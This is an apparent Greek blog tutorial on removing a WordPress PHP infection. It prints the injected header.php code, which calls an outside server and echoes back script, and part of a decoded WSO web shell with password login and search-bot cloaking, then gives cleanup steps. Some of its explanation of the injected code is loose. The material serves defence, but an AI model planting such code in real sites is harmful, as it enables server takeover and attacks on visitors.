ΑΦΑΙΡΕΣΗ WordPress PHP Virus

Αυτό το σεμινάριο παρουσιάζει μια συγκεκριμένη περίπτωση όπου ένα ιστολόγιο WordPress είχε μολυνθεί. Μετακίνηση WordPress Ιός PHP.

Τις προάλλες παρατήρησα έναν ύποπτο κώδικα που φαίνεται να είναι ιός PHP WordPress. Ο παρακάτω κώδικας PHP υπήρχε στο header.php, πριν από τη γραμμή </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Αυτός είναι κάποιος κώδικας PHP που μοιάζει σαν να προσπαθεί να ανακτήσει το περιεχόμενο ενός πόρου από έναν εξωτερικό διακομιστή, αλλά το τμήμα που αναφέρεται στη διεύθυνση URL είναι ατελές.

Ο μηχανισμός λειτουργίας είναι κάπως πιο περίπλοκος και το κάνει αυτό WordPress Ιός PHP αόρατος στους επισκέπτες των ιστοτόπων που επηρεάζονται. Αντίθετα, στοχεύει τις μηχανές αναζήτησης (Google) και σιωπηρά οδηγεί σε σημαντική μείωση του αριθμού των επισκεπτών στους επηρεαζόμενους ιστότοπους.

Λεπτομέρειες για το κακόβουλο λογισμικό WordPress PHP Virus

1. Ο παραπάνω κωδικός υπάρχει στο header.php.

2. Ένα αρχείο εμφανίστηκε στον διακομιστή wp-log.php στον φάκελο wp-includes.

3. wp-log.php περιέχει έναν κρυπτογραφημένο κώδικα, ο οποίος όμως είναι σχετικά εύκολος στην αποκρυπτογράφηση.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Αποκρυπτογράφηση κώδικα κακόβουλου λογισμικού από wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

Αυτό φαίνεται να είναι ένα κακόβουλο σενάριο PHP που περιέχει κώδικα για τον έλεγχο ταυτότητας και ενέργειες σε αρχεία και καταλόγους σε έναν διακομιστή. Μπορεί να φανεί πολύ εύκολα ότι αυτό το σενάριο περιέχει μεταβλητές όπως $auth_pass (κωδικός πρόσβασης ελέγχου ταυτότητας), $default_action (η προεπιλεγμένη ενέργεια), $default_use_ajax (χρησιμοποιώντας Ajax από προεπιλογή) και $default_charset (προεπιλεγμένη ρύθμιση χαρακτήρων).

Προφανώς, αυτό το σενάριο έχει μια ενότητα που ελέγχει τους πράκτορες χρηστών HTTP για να εμποδίσει την πρόσβαση σε ορισμένα ρομπότ Ιστού, όπως οι μηχανές αναζήτησης. Διαθέτει επίσης μια ενότητα που ελέγχει τη λειτουργία ασφαλείας PHP και ορίζει ορισμένους καταλόγους εργασίας.

4. Εάν υπάρχει πρόσβαση στο wp-log.php στο πρόγραμμα περιήγησης, εμφανίζεται μια ιστοσελίδα με ένα πεδίο σύνδεση. Με την πρώτη ματιά φαίνεται να είναι ένας διαχειριστής αρχείων μέσω του οποίου μπορούν εύκολα να αποσταλούν νέα αρχεία στον διακομιστή προορισμού.

Πώς αφαιρείτε τον ιό από έναν ιστότοπο WordPress?

Πάντα, η μη αυτόματη διαδικασία απομάκρυνσης από ιούς περιλαμβάνει πρώτα την ανακάλυψη και την κατανόηση της ευπάθειας.

1. Δημιουργήστε ένα αντίγραφο ασφαλείας για ολόκληρο τον ιστότοπο. Αυτό πρέπει να περιλαμβάνει τόσο τα αρχεία όσο και τη βάση δεδομένων.

2. Προσδιορίστε περίπου πόσο καιρό υπάρχει ο ιός και αναζητήστε στον διακομιστή web για τροποποιημένα ή πρόσφατα δημιουργημένα αρχεία εντός του κατά προσέγγιση χρονικού πλαισίου.

Για παράδειγμα, εάν θέλετε να δείτε τα αρχεία .php που δημιουργήθηκε ή τροποποιήθηκε την τελευταία εβδομάδα, εκτελέστε την εντολή στον διακομιστή:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

Είναι μια απλή μέθοδος με την οποία μπορείτε να αποκαλύψετε τα αρχεία WordPress μολυσμένα και εκείνα που περιέχουν κώδικα κακόβουλου λογισμικού.

3. Ελέγξτε το αρχείο .htaccess ύποπτων οδηγιών. Γραμμές άδειας ή εκτέλεση σεναρίου.

4. Ελέγξτε τη βάση δεδομένων. Είναι πολύ πιθανό κάποιες αναρτήσεις και σελίδες WordPress να υποβληθεί σε επεξεργασία με κακόβουλο λογισμικό ή προσθήκη νέων χρήστες με ρόλο administrator.

5. Ελέγξτε τα δικαιώματα εγγραφής για φακέλους και αρχεία. chmod και chown.

Τα συνιστώμενα δικαιώματα είναι: 644 για αρχεία και 755 για καταλόγους.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Ενημερώστε όλα WordPress Plugins / WordPress Themes.

Συγγενεύων: Fix Redirect WordPress Hack 2023 (Ιός ανακατεύθυνσης)

Αυτές είναι «βασικές» μέθοδοι με τις οποίες μπορείτε να αποβιώσετε έναν ιστότοπο/ιστολόγιο WordPress. Εάν αντιμετωπίζετε προβλήματα και χρειάζεστε βοήθεια, η ενότητα σχολίων είναι ανοιχτή.

Παθιασμένος με την τεχνολογία, γράφω με ευχαρίστηση στο StealthSettings.com από το 2006. Έχω εκτενή εμπειρία σε λειτουργικά συστήματα: macOS, Windows και Linux, καθώς και σε γλώσσες προγραμματισμού και πλατφόρμες για blogs (WordPress) και για online καταστήματα (WooCommerce, Magento, PrestaShop).

πώς να » WordPress » ΑΦΑΙΡΕΣΗ WordPress PHP Virus
Αφήστε ένα σχόλιο